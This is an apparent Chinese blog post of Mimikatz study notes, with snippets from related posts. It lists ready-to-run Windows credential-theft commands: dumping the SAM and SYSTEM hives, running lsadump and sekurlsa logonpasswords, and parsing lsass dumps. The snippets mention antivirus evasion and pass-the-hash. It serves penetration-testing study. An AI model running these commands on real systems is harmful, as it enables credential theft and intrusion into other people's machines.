Mimikatz学习笔记

最新推荐文章于 2025-10-02 21:37:42 发布
原创 最新推荐文章于 2025-10-02 21:37:42 发布 · 3.4k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

使用SAM和System文件抓取密码

导出sam和system文件抓取密码

reg save hklm\sam sam.hive
reg save hklm\system system.hive
在这里插入图片描述

使用mimikatz读取sam和system文件来获得NTLM Hash

lsadump::sam /sam:sam.hive /system:system.hive
在这里插入图片描述

使用mimikatz直接读取本地sam文件。

调成debug模式:privilege::debug
将权限提升至system:token::elevate
直接读取SAM文件:lsadump::sam
在这里插入图片描述

使用mimikatz在线读取SAM文件

不需要先运行mimikatz:
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords
在这里插入图片描述

mimikatz离线读取lsass.dump

需要先获得lsass的转储文件

使用mimikatz导出lsass.dump文件中的密码散列值

载入dump文件: sekurlsa::minidump lsass.DMP
导出密码: sekurlsa::logonPasswords full
在这里插入图片描述

针对内网的信息收集——mimikatz抓hash
ygylemon的博客
12-13 1189
之前我们已经用mimikatz抓取了windows上的密码,有明文的有hash的,但是这些方法还是远远不够,接下来我讲进一步解锁mimikatz的新姿势!首先获取到一个webshell,在cmd里输入下面这三个命令,在C盘就能看到sam,system,security这三个文件。这个网站看看能不能解出来,要不然就只能通过人脉和在群里臭不要脸的问了(之前的文章有演示过hhhh),话不多说,直接展示。如果上一种方法不行,也可以用这种方法,win7,win10,winserver08都可以抓到的。
内网渗透体系学习4
m0_55772907的博客
10-25 1050
内网
Mimikatz 常用命令解析
qq_46311839的博客
03-04 836
Mimikatz 是一个强大的 Windows 内存凭据提取工具,主要用于密码哈希、凭据和身份令牌的提取。本文整理了一些常见的 Mimikatz 命令及其作用,供学习参考。
mimikatz使用详解
qq_59468567的博客
04-12 1401
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
Windows内网渗透的“终极魔刃”:Mimikatz使用大全与深度解析
最新发布
专注于网络安全攻防技术与安全运营(SecOps)实践。
10-02 1044
在Windows渗透测试的舞台上,Mimikatz无疑是“王座”上的工具。它由法国安全研究员Benjamin Delpy(gentilkiwi)开发,能够直接从Windows操作系统的内存(尤其是LSASS进程)中提取明文密码、哈希、PIN码和Kerberos票据。掌握Mimikatz,意味着掌握了在Windows域环境中横向移动、权限提升乃至最终控制整个域的关键。
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
AA8j的博客
07-26 619
拓扑图 Windows系统散列值获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
使用mimikatz解析windows10系统盘(通常是 C 盘)的 Windows\System32\config 目录下SAM (Security Accounts Manager) 文件获取管理...
weixin_42598278的博客
01-12 546
使用 Mimikatz 工具可以解析 Windows 10 系统盘(通常是 C 盘)的 Windows\System32\config 目录下 SAM (Security Accounts Manager) 文件获取管理员密码。但是这是非法的行为, 不提倡使用。 ...
Mimikatz安装 lsass进程 SAM NTML
banliyaoguai的博客
05-14 1621
Mimikatz是一款开源的Windows安全工具,由法国安全研究员Benjamin Delpy开发。它最初被设计为用于学习C语言和进行Windows安全性实验的工具。然而,由于其强大的功能,它也可以用来从Windows系统中提取敏感信息,如明文密码、哈希值、PIN码和Kerberos票据等。总的来所它可以获取windows系统内存的密码,提供其他域的攻击方式。
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz
Zichel77的博客
10-09 3540
针对WIN7,还是用永恒之蓝。
精选资源
Empire学习笔记.pdf
09-25
Empire还提供了丰富的命令集来管理目标主机,如 `creds` 显示或返回凭证,`download` 和 `upload` 下载或上传文件,`bypassuac` 用于绕过用户账户控制,`mimikatz` 实现内存中密码提取,`psinject` 将Payload注入到...
小迪学习笔记(内网安全)(常见概念和信息收集)
weixin_63560942的博客
03-25 3471
本文主要讲解内网常见名词概念和信息收集的方式方法,为接下来的内网渗透做前提准备,一个好的信息收集可以让渗透事半功倍。
mimikatz直接抓密码.zip
03-23
7. **学习资源**: mimikatz_32.txt文件可能包含使用教程、命令参考或开发者笔记,对于学习和理解mimikatz的使用和原理非常有价值。 通过这个压缩包,学习者可以了解mimikatz的工作原理,学习如何在合法的环境中使用...
红日靶场1学习笔记
一颗小白菜的博客
10-04 1337
一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!
3.7-Mimikatz介绍和离线读取SAM文件抓取密码
qq_38122566的博客
03-12 1720
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,mimikatz可以从内存中提取明文密码、哈希、PIN 码和 kerberos 票证。mimikatz 还可以执行哈希传递、票证传递或构建黄金票证。顶目地址:https://github.com/gentilkiwi/mimikatz/模块命令如下:cls: 清屏。
Mimikatz使用
qq_46804551的博客
04-04 1136
简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 1万+
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
3.8-Mimikatz在线读取sam和lsass获取密码
qq_38122566的博客
03-12 611
使用mimikatz在线读取sam文件分开的命令如下连起来。
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 2171
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
如何获取windows系统SAM密码
m0_60870041的博客
11-30 9036
获取windows系统SAM密码
windows用户密码破解
热门推荐
qq_45927819的博客
03-03 1万+
文章目录一、hash简介二、Windows系统下的hash密码格式三、windows hash抓取1、通过SAM文件+mimikatz读取密码2、mimikatz3、procdump64+mimikatz4、QuarksPwDump5、wce四、利用Hash远程登录系统 一、hash简介 Hash主要用于信息安全领域中加密算法,渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面,域内用户的密码Hash是存在域控的N
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值